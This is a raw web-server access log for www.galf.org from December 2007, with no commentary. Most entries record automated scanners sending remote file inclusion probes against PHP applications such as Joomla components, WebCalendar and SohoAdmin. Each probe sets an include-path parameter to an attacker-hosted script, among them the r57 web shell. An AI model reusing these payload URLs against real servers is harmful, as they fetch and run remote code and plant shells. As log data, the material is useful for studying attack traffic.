84.244.151.79 - - [23/Dec/2007:16:00:11 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
84.244.151.79 - - [23/Dec/2007:16:00:11 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
81.21.78.60 - - [23/Dec/2007:16:00:34 -0800] "GET /logs/announcements.php?phpraid_dir=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.21.78.60 - - [23/Dec/2007:16:00:34 -0800] "GET /announcements.php?phpraid_dir=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
59.106.20.28 - - [23/Dec/2007:16:00:44 -0800] "GET /logs/access_071119.log/template.php?pagina=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
59.106.20.28 - - [23/Dec/2007:16:00:44 -0800] "GET /template.php?pagina=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
59.106.20.28 - - [23/Dec/2007:16:00:45 -0800] "GET /logs/template.php?pagina=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
81.21.78.60 - - [23/Dec/2007:16:00:50 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.21.78.60 - - [23/Dec/2007:16:00:51 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.9.145.107 - - [23/Dec/2007:16:01:03 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.azone168.com.tw/ananas//components/com_simpleboard/ranks/errors.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.9.145.107 - - [23/Dec/2007:16:01:03 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.azone168.com.tw/ananas//components/com_simpleboard/ranks/errors.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
59.106.20.28 - - [23/Dec/2007:16:01:07 -0800] "GET /logs/access_070730.log/template.php?pagina=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.9.145.107 - - [23/Dec/2007:16:01:08 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.azone168.com.tw/ananas//components/com_simpleboard/ranks/errors.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.9.145.107 - - [23/Dec/2007:16:01:08 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.azone168.com.tw/ananas//components/com_simpleboard/ranks/errors.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.9.145.107 - - [23/Dec/2007:16:01:32 -0800] "GET /logs//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.azone168.com.tw/ananas//components/com_simpleboard/ranks/errors.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.9.145.107 - - [23/Dec/2007:16:01:32 -0800] "GET //modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.azone168.com.tw/ananas//components/com_simpleboard/ranks/errors.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
161.58.198.111 - - [23/Dec/2007:16:01:39 -0800] "GET /logs/access_070917.log//modules/agendax/addevent.inc.php?agendax_path=http://www.thewellnessvillage.biz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
161.58.198.111 - - [23/Dec/2007:16:01:40 -0800] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.thewellnessvillage.biz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
161.58.198.111 - - [23/Dec/2007:16:01:40 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.thewellnessvillage.biz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
194.95.66.26 - - [23/Dec/2007:16:01:43 -0800] "GET /webcalendar/tools/send_reminders.php?includedir=http://www.ebci.ucr.ac.cr/administrator/images/.on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.9.145.107 - - [23/Dec/2007:16:01:43 -0800] "GET /logs//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.azone168.com.tw/ananas//components/com_simpleboard/ranks/errors.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
72.9.145.107 - - [23/Dec/2007:16:01:43 -0800] "GET //modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.azone168.com.tw/ananas//components/com_simpleboard/ranks/errors.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
161.58.198.111 - - [23/Dec/2007:16:01:43 -0800] "GET /logs/access_070625.log//modules/agendax/addevent.inc.php?agendax_path=http://www.thewellnessvillage.biz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.9.145.107 - - [23/Dec/2007:16:01:47 -0800] "GET /logs/announcements.php?phpraid_dir=http://www.azone168.com.tw/ananas//components/com_simpleboard/ranks/errors.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.9.145.107 - - [23/Dec/2007:16:01:47 -0800] "GET /announcements.php?phpraid_dir=http://www.azone168.com.tw/ananas//components/com_simpleboard/ranks/errors.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
58.74.175.5 - - [23/Dec/2007:16:02:27 -0800] "GET /logs/access_071203.log//index.php?pag=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
58.74.175.5 - - [23/Dec/2007:16:02:28 -0800] "GET //index.php?pag=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
58.74.175.5 - - [23/Dec/2007:16:02:28 -0800] "GET /logs//index.php?pag=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
81.21.78.60 - - [23/Dec/2007:16:03:41 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.21.78.60 - - [23/Dec/2007:16:03:41 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
194.95.66.26 - - [23/Dec/2007:16:04:01 -0800] "GET /logs/access.log/webcalendar/tools/send_reminders.php?includedir=http://www.ebci.ucr.ac.cr/administrator/images/.on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
194.95.66.26 - - [23/Dec/2007:16:04:01 -0800] "GET /webcalendar/tools/send_reminders.php?includedir=http://www.ebci.ucr.ac.cr/administrator/images/.on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
194.95.66.26 - - [23/Dec/2007:16:04:01 -0800] "GET /logs/webcalendar/tools/send_reminders.php?includedir=http://www.ebci.ucr.ac.cr/administrator/images/.on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
194.95.66.26 - - [23/Dec/2007:16:04:14 -0800] "GET /logs/access_071014.log/webcalendar/tools/send_reminders.php?includedir=http://www.ebci.ucr.ac.cr/administrator/images/.on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.169.67.3 - - [23/Dec/2007:16:04:29 -0800] "GET /logs/access_070730.logadministrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.nightgrooveband.com/n? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
62.48.192.42 - - [23/Dec/2007:16:04:48 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.printando.com/dotproject//test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
62.48.192.42 - - [23/Dec/2007:16:04:48 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.printando.com/dotproject//test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
192.220.109.46 - - [23/Dec/2007:16:04:58 -0800] "GET /logs/access_070716.log/JFIF.php?mosConfig_absolute_path=http://www.gaboo.com.br/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
192.220.109.46 - - [23/Dec/2007:16:04:58 -0800] "GET /JFIF.php?mosConfig_absolute_path=http://www.gaboo.com.br/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
192.220.109.46 - - [23/Dec/2007:16:04:58 -0800] "GET /logs/JFIF.php?mosConfig_absolute_path=http://www.gaboo.com.br/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
192.220.109.46 - - [23/Dec/2007:16:04:58 -0800] "GET /logs/access_070716.log/EXIF_Makernote.php?mosConfig_absolute_path=http://www.gaboo.com.br/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
192.220.109.46 - - [23/Dec/2007:16:04:58 -0800] "GET /EXIF_Makernote.php?mosConfig_absolute_path=http://www.gaboo.com.br/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
192.220.109.46 - - [23/Dec/2007:16:04:58 -0800] "GET /logs/EXIF_Makernote.php?mosConfig_absolute_path=http://www.gaboo.com.br/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
192.220.109.46 - - [23/Dec/2007:16:04:58 -0800] "GET /logs/access_070716.log/EXIF_Tags.php?mosConfig_absolute_path=http://www.gaboo.com.br/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
192.220.109.46 - - [23/Dec/2007:16:04:58 -0800] "GET /EXIF_Tags.php?mosConfig_absolute_path=http://www.gaboo.com.br/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
192.220.109.46 - - [23/Dec/2007:16:04:58 -0800] "GET /logs/EXIF_Tags.php?mosConfig_absolute_path=http://www.gaboo.com.br/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
192.220.109.46 - - [23/Dec/2007:16:04:59 -0800] "GET /logs/access_070716.log/IPTC.php?mosConfig_absolute_path=http://www.gaboo.com.br/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
192.220.109.46 - - [23/Dec/2007:16:04:59 -0800] "GET /IPTC.php?mosConfig_absolute_path=http://www.gaboo.com.br/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
192.220.109.46 - - [23/Dec/2007:16:04:59 -0800] "GET /logs/IPTC.php?mosConfig_absolute_path=http://www.gaboo.com.br/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
192.220.109.46 - - [23/Dec/2007:16:04:59 -0800] "GET /logs/access_070716.log/EXIF_Makernote.php??mosConfig_absolute_path=http://www.gaboo.com.br/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
192.220.109.46 - - [23/Dec/2007:16:04:59 -0800] "GET /EXIF_Makernote.php??mosConfig_absolute_path=http://www.gaboo.com.br/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
192.220.109.46 - - [23/Dec/2007:16:04:59 -0800] "GET /logs/EXIF_Makernote.php??mosConfig_absolute_path=http://www.gaboo.com.br/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.98.216.61 - - [23/Dec/2007:16:05:27 -0800] "GET //bbs//skin/zero_vote/error.php?dir=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.galf.org"
66.98.216.61 - - [23/Dec/2007:16:05:27 -0800] "GET /logs//bbs//skin/zero_vote/error.php?dir=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.galf.org"
89.159.200.63 - - [23/Dec/2007:16:05:41 -0800] "GET /logs/access.log HTTP/1.0" 200 12100 "-" "Lynx/2.8.5rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/1.4.4"
58.74.175.5 - - [23/Dec/2007:16:06:10 -0800] "GET /logs/access_071029.log//index.php?pag=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.9.145.107 - - [23/Dec/2007:16:06:15 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.azone168.com.tw/ananas//components/com_simpleboard/ranks/errors.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.9.145.107 - - [23/Dec/2007:16:06:16 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.azone168.com.tw/ananas//components/com_simpleboard/ranks/errors.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
192.220.109.46 - - [23/Dec/2007:16:07:01 -0800] "GET /logs/access_070910.log/EXIF_Makernote.php?mosConfig_absolute_path=http://www.gaboo.com.br/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
192.220.109.46 - - [23/Dec/2007:16:07:01 -0800] "GET /logs/access_070910.log/JFIF.php?mosConfig_absolute_path=http://www.gaboo.com.br/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
192.220.109.46 - - [23/Dec/2007:16:07:02 -0800] "GET /logs/access_070910.log/EXIF_Makernote.php??mosConfig_absolute_path=http://www.gaboo.com.br/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
192.220.109.46 - - [23/Dec/2007:16:07:02 -0800] "GET /logs/access_070910.log/IPTC.php?mosConfig_absolute_path=http://www.gaboo.com.br/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
192.220.109.46 - - [23/Dec/2007:16:07:02 -0800] "GET /logs/access_070910.log/EXIF_Tags.php?mosConfig_absolute_path=http://www.gaboo.com.br/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
74.6.20.143 - - [23/Dec/2007:16:08:30 -0800] "GET /logs/access_070611.log HTTP/1.0" 200 443571 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
194.95.66.26 - - [23/Dec/2007:16:08:57 -0800] "GET /logs/access_071203.log/webcalendar/tools/send_reminders.php?includedir=http://www.ebci.ucr.ac.cr/administrator/images/.on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
194.95.66.26 - - [23/Dec/2007:16:08:58 -0800] "GET /webcalendar/tools/send_reminders.php?includedir=http://www.ebci.ucr.ac.cr/administrator/images/.on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
194.95.66.26 - - [23/Dec/2007:16:08:58 -0800] "GET /logs/webcalendar/tools/send_reminders.php?includedir=http://www.ebci.ucr.ac.cr/administrator/images/.on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
89.207.81.253 - - [23/Dec/2007:16:09:01 -0800] "GET /logs//index2.php?p=http://asterweb.com.br/cav/s.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
89.207.81.253 - - [23/Dec/2007:16:09:02 -0800] "GET //index2.php?p=http://asterweb.com.br/cav/s.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
194.95.66.26 - - [23/Dec/2007:16:09:25 -0800] "GET /logs/access.log/webcalendar/tools/send_reminders.php?includedir=http://www.ebci.ucr.ac.cr/administrator/images/.on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
201.34.32.66 - - [23/Dec/2007:16:09:29 -0800] "GET /logs//administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=http://www.hobbiz.com/images/powered/_vti_cnf/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
201.34.32.66 - - [23/Dec/2007:16:09:29 -0800] "GET //administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=http://www.hobbiz.com/images/powered/_vti_cnf/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.119.200.212 - - [23/Dec/2007:16:13:25 -0800] "GET //index.php?arquivo=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.249.21.157 - - [23/Dec/2007:16:13:48 -0800] "GET /logs/index.php?include=http://nkdb.org/AsaMall/makeup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
66.249.21.157 - - [23/Dec/2007:16:13:48 -0800] "GET /index.php?include=http://nkdb.org/AsaMall/makeup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.246.252.43 - - [23/Dec/2007:16:13:57 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://gw-gold.net/xpl/good/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.246.252.43 - - [23/Dec/2007:16:14:08 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://gw-gold.net/xpl/good/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
69.93.25.2 - - [23/Dec/2007:16:14:08 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://gw-gold.net/xpl/good/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.246.252.43 - - [23/Dec/2007:16:14:08 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://gw-gold.net/xpl/good/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.93.25.2 - - [23/Dec/2007:16:14:08 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://gw-gold.net/xpl/good/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.93.25.2 - - [23/Dec/2007:16:14:10 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://gw-gold.net/xpl/good/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
66.246.252.43 - - [23/Dec/2007:16:14:51 -0800] "GET /logs/access_070827.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://gw-gold.net/xpl/good/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.246.252.43 - - [23/Dec/2007:16:14:52 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://gw-gold.net/xpl/good/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
66.246.252.43 - - [23/Dec/2007:16:14:52 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://gw-gold.net/xpl/good/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.93.25.2 - - [23/Dec/2007:16:14:54 -0800] "GET /logs/access_070827.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://gw-gold.net/xpl/good/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.93.25.2 - - [23/Dec/2007:16:14:54 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://gw-gold.net/xpl/good/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.93.25.2 - - [23/Dec/2007:16:14:54 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://gw-gold.net/xpl/good/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
81.21.78.60 - - [23/Dec/2007:16:15:12 -0800] "GET /logs/announcements.php?phpraid_dir=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.21.78.60 - - [23/Dec/2007:16:15:13 -0800] "GET /announcements.php?phpraid_dir=http://claroline.lct-net.cl/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
59.106.20.28 - - [23/Dec/2007:16:15:26 -0800] "GET /logs/access_071015.log/index.php?arquivo=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
59.106.20.28 - - [23/Dec/2007:16:15:26 -0800] "GET /index.php?arquivo=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
59.106.20.28 - - [23/Dec/2007:16:15:26 -0800] "GET /logs/index.php?arquivo=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
58.74.175.5 - - [23/Dec/2007:16:15:58 -0800] "GET /logs/access_071028.log//index.php3?s=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.137.246.138 - - [23/Dec/2007:16:16:01 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://gw-gold.net/xpl/good/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
209.137.246.138 - - [23/Dec/2007:16:16:04 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://gw-gold.net/xpl/good/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
207.44.162.119 - - [23/Dec/2007:16:16:15 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.246.252.43 - - [23/Dec/2007:16:16:28 -0800] "GET /logs/access_070716.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://gw-gold.net/xpl/good/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.137.246.138 - - [23/Dec/2007:16:16:33 -0800] "GET /logs/access_070827.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://gw-gold.net/xpl/good/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
209.137.246.138 - - [23/Dec/2007:16:16:34 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://gw-gold.net/xpl/good/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.137.246.138 - - [23/Dec/2007:16:16:34 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://gw-gold.net/xpl/good/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.137.246.138 - - [23/Dec/2007:16:16:46 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://gw-gold.net/xpl/good/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.36.115.46 - - [23/Dec/2007:16:17:21 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "CazoodleBot/CazoodleBot-0.1 (CazoodleBot Crawler; http://www.cazoodle.com/cazoodlebot; cazoodlebot@cazoodle.com)" "www.galf.org"
72.36.115.46 - - [23/Dec/2007:16:17:22 -0800] "GET /logs/scripts.log HTTP/1.0" 200 196608 "-" "CazoodleBot/CazoodleBot-0.1 (CazoodleBot Crawler; http://www.cazoodle.com/cazoodlebot; cazoodlebot@cazoodle.com)" "www.galf.org"
59.106.20.28 - - [23/Dec/2007:16:17:43 -0800] "GET /logs/access_071029.log/index.php?arquivo=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.93.25.2 - - [23/Dec/2007:16:17:58 -0800] "GET /logs/access_070716.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://gw-gold.net/xpl/good/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.137.246.138 - - [23/Dec/2007:16:19:31 -0800] "GET /logs/access_070716.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://gw-gold.net/xpl/good/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
211.129.152.113 - - [23/Dec/2007:16:19:49 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://gw-gold.net/xpl/good/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.44.162.119 - - [23/Dec/2007:16:20:13 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://curraro.altervista.org/djfelix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.26.63.10 - - [23/Dec/2007:16:21:05 -0800] "GET /logs//?mosConfig_absolute_path=http://pawang.in/r57.txt??? HTTP/1.1" 200 5519 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
64.26.63.10 - - [23/Dec/2007:16:21:06 -0800] "GET //?mosConfig_absolute_path=http://pawang.in/r57.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
211.129.152.113 - - [23/Dec/2007:16:23:24 -0800] "GET /logs/access_070827.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://gw-gold.net/xpl/good/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.129.152.113 - - [23/Dec/2007:16:23:24 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://gw-gold.net/xpl/good/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.44.162.119 - - [23/Dec/2007:16:23:24 -0800] "GET /logs/access_071210.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
207.44.162.119 - - [23/Dec/2007:16:23:25 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
